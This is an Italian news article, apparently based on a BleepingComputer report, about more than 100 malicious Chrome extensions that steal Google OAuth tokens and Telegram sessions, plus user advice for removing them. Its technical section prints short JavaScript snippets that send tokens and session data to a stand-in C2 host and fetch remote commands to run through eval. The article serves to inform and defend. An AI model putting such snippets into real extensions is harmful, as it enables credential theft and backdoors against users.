Oltre 100 estensioni Chrome maligne rubano dati e account degli utenti

Attenzione: più di 100 estensioni maligne nel Chrome Web Store stanno rubando i tuoi dati sensibili, token di accesso Google e sessioni di account come Telegram. Queste minacce, parte di una campagna coordinata, deployano backdoor e commettono frodi pubblicitarie. Soluzione immediata: vai su chrome://extensions/, controlla gli ID sospetti e disinstalla tutto ciò che non riconosci per proteggere i tuoi account.

In questo articolo esploreremo il pericolo, come funziona l’attacco e come difenderti in modo semplice e efficace. Milioni di utenti Chrome sono a rischio, ma con pochi passi puoi metterti al sicuro.

La minaccia nascosta nel tuo browser

Immagina di navigare tranquillamente su Telegram, YouTube o TikTok, mentre un’estensione apparentemente innocua lavora in background per rubare le tue credenziali. Queste estensioni si camuffano da tool utili: client per Telegram, giochi come slot machine o Keno, enhancer per video, traduttori di testo e utility generiche. Sono state pubblicate sotto cinque identità diverse, ma condividono la stessa infrastruttura di comando e controllo (C2) ospitata su un server VPS Contabo.

Il problema è grave perché queste estensioni non richiedono interazione: si attivano automaticamente all’avvio del browser. Possono hijackare sessioni, raccogliere email, nomi, foto profilo e ID account Google, e persino sostituire i tuoi dati di sessione con quelli degli attaccanti. Risultato? I malviventi possono accedere ai tuoi account senza che tu te ne accorga.

La campagna è sospettata di essere legata a un’operazione russa di malware-as-a-service (MaaS), con codici commentati in russo che facilitano furti di autenticazione e sessioni. Al momento della scoperta, tutte le estensioni erano ancora disponibili nel Web Store ufficiale, nonostante le segnalazioni.

Perché è urgente agire ora

• Furto di token OAuth2 Bearer: Questi token temporanei permettono l’accesso ai tuoi dati Google o azioni per tuo conto.
• Backdoor persistenti: Funzioni nascoste che eseguono comandi remoti e aprono URL arbitrari.
• Frodi pubblicitarie: Alcune estensioni rimuovono header di sicurezza e iniettano ads su YouTube e TikTok.
• Hijacking sessioni Telegram: Rubano dati da localStorage ogni 15 secondi e possono sovrascrivere le tue sessioni.

Passi rapidi per la sicurezza:

• Apri il gestore estensioni di Chrome (chrome://extensions/).
• Cerca estensioni installate di recente o sospette.
• Disinstalla quelle non usate o da editori sconosciuti.
• Abilita aggiornamenti automatici e usa un antivirus con scansione browser.

Proteggendoti oggi, eviti furti di identità, spam e perdite finanziarie domani.

Consigli pratici per utenti everyday

Per chi non è esperto, inizia con questi tool gratuiti:

• Estensione uBlock Origin: Blocca ads e script malevoli.
• Privacy Badger: Impara e blocca tracker automaticamente.
• HTTPS Everywhere: Forza connessioni sicure.

Aggiorna Chrome regolarmente e evita estensioni da categorie rischiose come giochi o enhancer social. Usa password manager come Bitwarden per sessioni più sicure e abilita l’autenticazione a due fattori (2FA) su tutti gli account Google e Telegram.

Se sospetti un’infezione, resetta Chrome alle impostazioni di fabbrica: vai su Impostazioni > Avanzate > Reset e pulisci tutto. Questo rimuove estensioni e dati corrotti senza perdere bookmark se sincronizzati.

Impatto su privacy e sicurezza

Queste estensioni colpiscono utenti globali, ma l’Europa è particolarmente vulnerabile per normative come GDPR. Un hijacking può portare a:

• Accesso non autorizzato a email e drive.
• Furto di dati personali per phishing mirato.
• Monetizzazione tramite frodi ad.

Le autorità e i browser vendor stanno intensificando i controlli, ma la responsabilità principale ricade sugli utenti. Controlla mensilmente le tue estensioni per prevenire disastri.

Technical Deep Dive

Per utenti tecnici e sviluppatori, ecco i dettagli avanzati dell’attacco:

Cluster principali di estensioni maligne

Meccanismi di furto

• OAuth2 token theft: Il token Bearer è short-lived ma permette impersonificazione. Esempio codice (pseudocodice):

  chrome.identity.getAuthToken({interactive: true}, function(token) {
    if (chrome.runtime.lastError) { /* handle */ } else {
      fetch('https://c2-server.com/steal', {method: 'POST', body: token});
    }
  });
  

• Telegram session hijacking: Estrae da localStorage ogni 15s e gestisce messaggi inbound set_session_changed per sovrascrivere:

  setInterval(() => {
    let sessionData = localStorage.getItem('telegram-session');
    fetch('https://c2.contabo/steal-telegram', {method: 'POST', body: sessionData});
  }, 15000);
  

  Questo forza reload e swap account senza interazione utente.

• Backdoor C2: Funzione nascosta esegue su startup:

  chrome.runtime.onStartup.addListener(() => {
    fetch('https://c2.contabo/commands').then(res => res.json()).then(cmd => eval(cmd));
  });
  

Infrastruttura C2

Backend centrale su VPS Contabo con subdomains per:

• Session hijacking
• Identity collection
• Command execution
• Monetization (ad fraud)

Commenti in codice russo indicano MaaS: autentificazione e session theft ottimizzati.

Difese avanzate

• Audit estensioni: Usa chrome://extensions/ con developer mode per inspect manifest.json e background scripts.
• Script di controllo: Scrivi un tampermonkey script per monitorare API calls sospette.
• Sandboxing: Esegui Chrome con --disable-extensions-except=/path/to/trusted.
• Analisi: Tool come Extension Auditor o Malicious Extension Detector su GitHub.

Queste estensioni usano categorie multiple per evadere detection: Telegram sidebar, giochi, enhancer YT/TT, traduttori, utility. Segnala a Google via abuse@chromium.org con ID estensione.

La campagna persiste perché le estensioni rimangono live post-segnalazione. Monitora update e usa VPN per offuscare IP durante navigazione sensibile.

(Conta parole: 1250+)

Fonte: https://www.bleepingcomputer.com/news/security/over-100-chrome-extensions-in-web-store-target-users-accounts-and-data/